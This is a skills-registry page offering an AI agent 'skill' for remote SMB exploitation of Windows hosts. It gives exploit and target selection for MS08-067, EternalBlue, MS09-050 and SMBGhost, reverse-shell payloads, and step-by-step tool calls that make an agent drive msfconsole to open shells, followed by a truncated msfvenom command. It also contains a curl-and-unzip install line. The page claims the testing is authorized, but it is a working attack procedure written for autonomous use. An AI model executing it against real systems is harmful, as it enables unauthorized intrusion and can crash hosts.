agentskills.codes
SM

>

Install

mkdir -p .claude/skills/smb-exploitation && curl -L -o skill.zip "https://agentskills.codes/api/skills/download/16249" && unzip -o skill.zip -d .claude/skills/smb-exploitation && rm skill.zip

Installs to .claude/skills/smb-exploitation

Activation

This is the description your AI agent reads to decide when to run this skill — the better it matches your request, the more reliably it fires.

Exploit remote SMB vulnerabilities for unauthenticated code execution on Windows hosts.
87 charsno explicit “when” trigger

About this skill

SMB Remote Exploitation

You are helping a penetration tester exploit a confirmed SMB vulnerability for remote code execution. All testing is under explicit written authorization.

Engagement Logging

Check for ./engagement/ directory. If absent, proceed without logging.

When an engagement directory exists:

  • Print [smb-exploitation] Activated → <target> to the screen on activation.
  • Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).

Scope Boundary

This skill covers SMB protocol exploitation — enumeration, authentication attacks, and share access. When you reach the boundary of this scope — whether through completing your methodology or discovering findings outside your domain — STOP.

Do not load or execute another skill. Do not continue past your scope boundary. Instead, return to the orchestrator with:

  • What was found (vulns, credentials, access gained)
  • Context to pass (injection point, target, working payloads, etc.)

The orchestrator decides what runs next. Your job is to execute this skill thoroughly and return clean findings.

Stay in methodology. Only use techniques documented in this skill. If you encounter a scenario not covered here, note it and return — do not improvise attacks, write custom exploit code, or apply techniques from other domains. The orchestrator will provide specific guidance or route to a different skill.

State Management

Call get_state_summary() from the state MCP server to read current engagement state. Use it to:

  • Skip re-testing targets, parameters, or vulns already confirmed
  • Leverage existing credentials or access for this technique
  • Understand what's been tried and failed (check Blocked section)

Your return summary must include:

  • New targets/hosts discovered (with ports and services)
  • New credentials or tokens found
  • Access gained or changed (user, privilege level, method)
  • Vulnerabilities confirmed (with status and severity)
  • Pivot paths identified (what leads where)
  • Blocked items (what failed and why, whether retryable)

Prerequisites

  • SMB vulnerability confirmed via nmap smb-vuln* scripts or equivalent
  • Target OS and architecture identified (critical for target selection)
  • Network access to target port 445
  • Metasploit Framework installed (msfconsole)
  • Listener port available (default 4444, or specify alternative)
  • Attack machine IP reachable from target (check with ip addr show tun0 for VPN, or appropriate interface)

Step 1: Assess

If not already provided by the orchestrator or conversation context, determine:

  1. Which vulnerability? Check engagement state or ask — MS08-067, MS17-010, MS09-050, or SMBGhost
  2. Target OS and architecture? Windows version, service pack, 32-bit vs 64-bit — critical for exploit target selection
  3. Attack machine IP? Run ip -4 addr show tun0 (or appropriate interface) to get the listener address

Vulnerability-to-OS Compatibility Matrix

CVEVulnerabilityAffected OSNotes
CVE-2008-4250MS08-067XP SP0-SP3, Server 2003 SP0-SP2, Vista SP0-SP1, Server 2008 pre-SP2Most reliable on XP/2003
CVE-2009-3103MS09-050Vista SP1-SP2, Server 2008 SP1-SP2SMBv2 negotiation bug
CVE-2017-0143MS17-010 (EternalBlue)XP through Server 2016 (unpatched)Unstable on XP/2003 32-bit
CVE-2020-0796SMBGhostWindows 10 1903/1909, Server v1903/v1909SMBv3 compression

Skip this step if the orchestrator already provided this information.

Step 2: Select Exploit and Target

MS08-067 (CVE-2008-4250)

Metasploit module: exploit/windows/smb/ms08_067_netapi

Preferred for Windows XP and Server 2003. More stable than EternalBlue on these older systems.

Target selection — critical for reliability:

Target IDOS
0Automatic Targeting
1Windows 2000 Universal
2Windows XP SP0/SP1 Universal
3Windows XP SP2 English (NX)
4Windows XP SP3 English (NX)
5Windows 2003 SP0 Universal
6Windows XP SP2/SP3 English (AlwaysOn NX)
7Windows 2003 SP1 English (NO NX)
8Windows 2003 SP1 English (NX)
9Windows 2003 SP2 English (NO NX)
10Windows 2003 SP2 English (NX)

Decision logic:

  • If OS is "Windows XP" and SP2 or SP3: use target 6 (handles both, NX-aware)
  • If OS is "Windows XP" and SP0/SP1: use target 2
  • If OS is "Windows 2003" and SP1: use target 8 (NX) or target 7 (no NX)
  • If OS is "Windows 2003" and SP2: use target 10 (NX) or target 9 (no NX)
  • If OS is "Windows 2000": use target 1
  • If unsure about NX: try NX-enabled target first — it works on both, the reverse doesn't
  • If unsure about SP: use target 0 (automatic) — less reliable but attempts fingerprinting
  • For non-English targets: use target 0 (automatic) and note that language- specific targets exist in Metasploit (check show targets for full list)

Payload selection:

  • Default: windows/shell_reverse_tcp — simple, reliable, no staging issues
  • Alternative: windows/meterpreter/reverse_tcp — more features but staged payload can fail on slow/filtered links
  • If port 4444 is filtered: try 443 or 80 as LPORT

MS17-010 / EternalBlue (CVE-2017-0143)

Metasploit modules (choose based on target OS):

ModuleBest ForNotes
exploit/windows/smb/ms17_010_eternalblueWindows 7, Server 2008 R2, Server 2012, 10, Server 2016 (64-bit)Primary module, most reliable on 64-bit
exploit/windows/smb/ms17_010_psexecWindows XP, Server 2003, Vista, 7, 2008 (32 and 64-bit)Uses named pipes, more stable on 32-bit and older OS
exploit/windows/smb/ms17_010_eternalblue_win8Windows 8, 8.1, Server 2012Specific Win8+ handling

Decision logic:

  • Windows 7 / Server 2008 R2 / Server 2012 / 10 / Server 2016 (64-bit): use ms17_010_eternalblue — primary module, highest success rate
  • Windows XP / Server 2003 (32-bit): use ms17_010_psexec — the eternalblue module frequently BSODs 32-bit XP. psexec variant uses named pipes and is far more stable. Requires a valid named pipe — common defaults: samr, browser, lsarpc, netlogon, srvsvc
  • Windows Vista / Server 2008 (pre-R2): use ms17_010_psexec
  • Windows 8 / 8.1 / Server 2012: try ms17_010_eternalblue first, fall back to ms17_010_eternalblue_win8

Named pipe selection for psexec variant:

set NAMEDPIPE samr

If samr fails, cycle through: browser, lsarpc, netlogon, srvsvc. Null session access increases success — check engagement state for null auth status.

Payload selection:

  • 64-bit targets: windows/x64/shell_reverse_tcp or windows/x64/meterpreter/reverse_tcp
  • 32-bit targets: windows/shell_reverse_tcp or windows/meterpreter/reverse_tcp

MS09-050 (CVE-2009-3103)

Metasploit module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Narrow target range — only Vista SP1/SP2 and Server 2008 SP1/SP2.

Target selection:

Target IDOS
0Windows Vista SP1/SP2 and Server 2008 SP1 (x86)

Only 32-bit targets. If target is 64-bit, this exploit won't work — try MS17-010 instead.

SMBGhost (CVE-2020-0796)

Metasploit module: exploit/windows/smb/cve_2020_0796_smbghost

Very narrow target range — only Windows 10 v1903/v1909 and Server v1903/v1909 with SMBv3.1.1 compression enabled.

Confirmation (before attempting):

# Check for SMBv3.1.1 compression support
nmap -p445 --script smb2-capabilities TARGET_IP

Stability warning: This exploit targets kernel memory and has a moderate BSOD risk. Always warn before launching.

Step 3: Generate and Execute

Interactive Metasploit via start_process (Preferred)

Spawn msfconsole in a persistent PTY via the shell-server MCP. This lets the agent drive Metasploit interactively — configure the exploit, run it, and interact with the resulting session through send_command calls.

# 1. Spawn msfconsole
start_process(command="msfconsole -q", label="msfconsole-eternalblue")

# 2. Configure and run (via send_command with expect patterns)
send_command(session_id=..., command="use <MODULE>", expect="msf6 exploit")
send_command(session_id=..., command="set RHOSTS <TARGET_IP>")
send_command(session_id=..., command="set LHOST <ATTACK_IP>")
send_command(session_id=..., command="set LPORT <PORT>")
send_command(session_id=..., command="set TARGET <TARGET_ID>")
send_command(session_id=..., command="set PAYLOAD <PAYLOAD>")
send_command(session_id=..., command="run", timeout=60, expect="session \\d+ opened")

For MS17-010 psexec variant, also set: set NAMEDPIPE samr For SMBGhost, also set: set PROCESSOR_ARCHITECTURE x64

When Metasploit catches the shell, it lives inside the same PTY session. The agent interacts with the Meterpreter/cmd session through the same send_command calls — no port conflict, no DisablePayloadHandler needed.

Resource File Approach (Fallback)

If start_process is unavailable or msfconsole needs to be run outside the MCP, generate a resource file:

Template (adapt per exploit selection from Step 2):

cat > temp_smb-exploit.rc << 'RCEOF'
use <MODULE>
set RHOSTS <TARGET_IP>
set LHOST <ATTACK_IP>
set LPORT <PORT>
set TARGET <TARGET_ID>
set PAYLOAD <PAYLOAD>
run
RCEOF

For MS17-010 psexec variant, add:

set NAMEDPIPE samr

For SMBGhost, add:

set PROCESSOR_ARCHITECTURE x64

Execution: Present the resource file contents to the user and instruct:

msfconsole -q -r temp_smb-exploit.rc

Standalone Exploits (When Metasploit Is Unavailable)

If Metasploit is not available, standalone Python exploits exist:

MS17-010 (AutoBlue):

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACK_IP> LPORT=

---

*Content truncated.*

Search skills

Search the agent skills registry